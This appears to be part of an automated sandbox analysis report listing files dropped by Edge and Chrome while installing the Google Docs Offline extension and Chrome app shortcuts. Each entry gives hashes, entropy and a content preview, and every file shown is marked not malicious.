SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\f1bb5283-9519-4a51-9b89-0d0aa6591a97.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 10 02:55:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9773627411097654
Encrypted:	false
SSDEEP:	48:8SdITsYAHdidAKZdA19ehwiZUklqehly+3:8ZfCqy
MD5:	CB51493CBAEF11D476FA87C1A17D28CD
SHA1:	E4B10E73890DE1712537473CB16836A7F7CD90CE
SHA-256:	DD3BF642F5942241A97CC0E2C9FB243EA1B53A717EE35680614C521AFDC766A6
SHA-512:	590B78A466594983C3B4768C4AF0FC18C0470105D022D59BC0901BEAC1FE66992BA7BE1CDAA61664E03153D9A58C281A37A73A4D212B23756B065CDEB9DBE73C
Malicious:	false
Preview:	L..................F.@.. ...$+.,....=.BT$3..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VjY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 10 02:55:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9914840933233746
Encrypted:	false
SSDEEP:	48:8edITsYAHdidAKZdA1weh/iZUkAQkqehay+2:89fY9Qny
MD5:	92F65D3302F6D678C7E905D36E6E4C48
SHA1:	2F1062AA5097B4FCF9A72049134CD1E5E39C8DDC
SHA-256:	042030C5F630633674DCA2007E553D33D12CD0CFCF52DA776302B0F63480FF0F
SHA-512:	856C2E774ED3FC18EEEC048EC28CD46C18DCE9F254E3FAE3309591232D5502E193B43EF6A5DA0A5778AB134A2253EEAB9B38A2750CB736F26B237DE0EA8F82A5
Malicious:	false
Preview:	L..................F.@.. ...$+.,....y.9T$3..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IjY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VjY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VjY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VjY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VjY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............>.q.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.005267936490029
Encrypted:	false
SSDEEP:	48:8xZdITsYsHdidAKZdA14tseh7sFiZUkmgqeh7sMy+BX:8xMfUnmy
MD5:	5B41FD3CAF00A1F060090536F2A9DCEC
SHA1:	F7966455E4668CB6F97E8DA3515AE8E6E00ECBA1
SHA-256:	684B35D47E0D960323C48379728965C4569B4263175644AEA834C4FF97D9B577
SHA-512:	09F28A324C567AC51E35053C400BAC78861209B5E6FD27D85DCF2F0C374EFC4EDD5E9D6137CE23F49865D9EDF99F62EBDDEAF0C9C8CDBC37CEC476761FC70E42
Malicious:	false
